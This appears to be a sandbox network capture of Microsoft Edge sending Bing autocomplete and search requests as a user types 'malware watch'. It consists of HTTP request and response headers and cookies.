set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=8CB7DF4FD2CE4B9B884F600947DDF0BE&dmnchg=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20250130; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=1652C71B99BD64A02B13D29F98EE65B0; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274626.1ad0e67d
-
GEThttps://www.bing.com/qbox?query=malwa&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=066fdebfec3946e7ab733f7a782d2e15&oit=1&cp=5&pgcl=4msedge.exeRemote address:88.221.135.16:443RequestGET /qbox?query=malwa&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=066fdebfec3946e7ab733f7a782d2e15&oit=1&cp=5&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 679bf74256c44f6785cdf5ef358f748b
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-9dh6Z7tienOXSb3NiToSa7GxbIkk/pkuIz76HlvFoZg='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 30 Jan 2025 22:03:46 GMT
set-cookie: MUID=20BE9CB9C73E6BCF3C2B893DC66D6ADE; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=20BE9CB9C73E6BCF3C2B893DC66D6ADE; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=1744D4A8DDE265210C26C12CDCB164A6; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=17DFA0EDD1C74C238BECEC8E2E8ACF8B&dmnchg=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20250130; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=1744D4A8DDE265210C26C12CDCB164A6; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274626.1ad0e869
-
GEThttps://www.bing.com/qbox?query=malwar&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=e331f79cfad342b8b549fc0dcfb17c29&oit=1&cp=6&pgcl=4msedge.exeRemote address:88.221.135.16:443RequestGET /qbox?query=malwar&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=e331f79cfad342b8b549fc0dcfb17c29&oit=1&cp=6&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 679bf742ee834a7b859e0dba1423201f
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-+XrPgjCS30Jyk2oKPqzsX8mKJ/ADf0vV1ruXZ+ckjhQ='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 30 Jan 2025 22:03:46 GMT
set-cookie: MUID=1A27125597856CCC12C107D196EA6D38; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=1A27125597856CCC12C107D196EA6D38; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=0727660C331960B132D2738832766180; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=BD81FFA40B1D442C8F1568BA1D947F4C&dmnchg=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20250130; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=0727660C331960B132D2738832766180; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274626.1ad0e90a
-
GEThttps://www.bing.com/qbox?query=malware&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=01d9835af3444a7baccd189256057f6a&oit=1&cp=7&pgcl=4msedge.exeRemote address:88.221.135.16:443RequestGET /qbox?query=malware&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=01d9835af3444a7baccd189256057f6a&oit=1&cp=7&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 679bf742b0cf4d6a8df5bd2e24703add
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-wfBvxJegtc83e5r0DtDrwqcXFChgHimCH59KLGMSyu8='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 30 Jan 2025 22:03:46 GMT
set-cookie: MUID=2D26CF7D7C5560332BE1DAF97D3D61E0; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=2D26CF7D7C5560332BE1DAF97D3D61E0; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=213A3AA958516CCF0A212F2D59396DA4; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=470A5AC11BD3432DA39BF394F509F33F&dmnchg=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20250130; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:46 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=213A3AA958516CCF0A212F2D59396DA4; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274626.1ad0ea6d
-
GEThttps://www.bing.com/qbox?query=malware+&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=34b199184c304076aff97dc838d6a0de&oit=1&cp=8&pgcl=4msedge.exeRemote address:88.221.135.16:443RequestGET /qbox?query=malware+&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=34b199184c304076aff97dc838d6a0de&oit=1&cp=8&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 679bf74354d340ad93d762b818644ff2
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-Bg1xz6LRLJ2EgTgfBiTYa7cZQ7GXsOluuQQM4XsHWMo='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 30 Jan 2025 22:03:47 GMT
set-cookie: MUID=17C570D66A9F6BF836D765526B066A0D; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=17C570D66A9F6BF836D765526B066A0D; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=00FF972172B36DF737BF82A5732A6C1C; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=249E2E26C22C474A9AF88EDEAD419BD9&dmnchg=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20250130; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=00FF972172B36DF737BF82A5732A6C1C; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274627.1ad0eb95
-
GEThttps://www.bing.com/qbox?query=malware+w&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=516ba68bc9ab42f99f9d6b3c1337c29f&oit=4&cp=9&pgcl=4msedge.exeRemote address:88.221.135.16:443RequestGET /qbox?query=malware+w&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=516ba68bc9ab42f99f9d6b3c1337c29f&oit=4&cp=9&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 679bf7432c7c44baa558331ced3908e3
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-IGzVW0z2TGOpixQ4ZAVxwy8h5KkvFfdB0xbqZeE+ONM='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 30 Jan 2025 22:03:47 GMT
set-cookie: MUID=0BB76B04E2C96E7608707E80E34E6FDA; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=0BB76B04E2C96E7608707E80E34E6FDA; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=361CD51C9CEC6250217CC0989D6B6346; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=55810A8AB7054073B872F9FF4E1AAB88&dmnchg=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20250130; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=361CD51C9CEC6250217CC0989D6B6346; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274627.1ad0ec41
-
GEThttps://www.bing.com/qbox?query=malware+wat&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=663a746290a44cb490445886b87a4446&oit=4&cp=11&pgcl=4msedge.exeRemote address:88.221.135.16:443RequestGET /qbox?query=malware+wat&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=663a746290a44cb490445886b87a4446&oit=4&cp=11&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
cache-control: private, max-age=0
content-encoding: br
expires: Thu, 30 Jan 2025 22:02:47 GMT
vary: Accept-Encoding
x-eventid: 679bf743624149b99a0843177321b5f6
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
strict-transport-security: max-age=31536000; includeSubDomains; preload
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-gvlCg6juIkHnZC+gzBAgk4qYqqddQuxiNdXNMr3MUcw='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp&ndcParam=QWthbWFp"}]}
report-to: {"group":"crossorigin-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0,"include_subdomains":true}
cross-origin-embedder-policy-report-only: 'require-corp; report-to=\"crossorigin-errors\"'
cross-origin-opener-policy-report-only: 'same-origin; report-to=\"crossorigin-errors\"'
date: Thu, 30 Jan 2025 22:03:47 GMT
set-cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5; domain=.bing.com; path=/; secure; SameSite=None
set-cookie: SRCHS=PC=U531; domain=.bing.com; path=/; secure; SameSite=None
set-cookie: SRCHD=AF=ANAB01; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20250130; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:47 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274627.1ad0edd3
set-cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1; Domain=.bing.com; Path=/; Expires=Fri, 31 Jan 2025 00:03:47 GMT; Max-Age=7200; Secure
-
GEThttps://www.bing.com/qbox?query=malware+watc&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=9eea3561c3144ffaac009de7b631cb0e&oit=4&cp=12&pgcl=4msedge.exeRemote address:88.221.135.16:443RequestGET /qbox?query=malware+watc&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=9eea3561c3144ffaac009de7b631cb0e&oit=4&cp=12&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: font/woff2
cache-control: public, max-age=15552000
last-modified: Mon, 01 Jan 1601 00:00:00 GMT
x-eventid: 661aafd86e0b4a0c8792a1f83cd446ca
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-3vTAQNKq8Us8FU4N1YKatO/0vBvTusxxyorbrP2yIH8='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
date: Thu, 30 Jan 2025 22:03:47 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274627.1ad0eeeb
-
GEThttps://www.bing.com/qbox?query=malware+watch&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=e72b39e5b7a84159a6f31e39bd43ee3e&oit=4&cp=13&pgcl=4msedge.exeRemote address:88.221.135.16:443RequestGET /qbox?query=malware+watch&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=e72b39e5b7a84159a6f31e39bd43ee3e&oit=4&cp=13&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: font/woff2
cache-control: public, max-age=15552000
last-modified: Mon, 01 Jan 1601 00:00:00 GMT
x-eventid: 661b7fb4a5a64a25bfe52f31cdb238a2
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-Dc7XB6hZwYD7vh6hxGugqMXoa2v2PSgRTnvZk3RerSA='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
date: Thu, 30 Jan 2025 22:03:47 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274627.1ad0eeec
-
GEThttps://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531msedge.exeRemote address:88.221.135.16:443RequestGET /search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
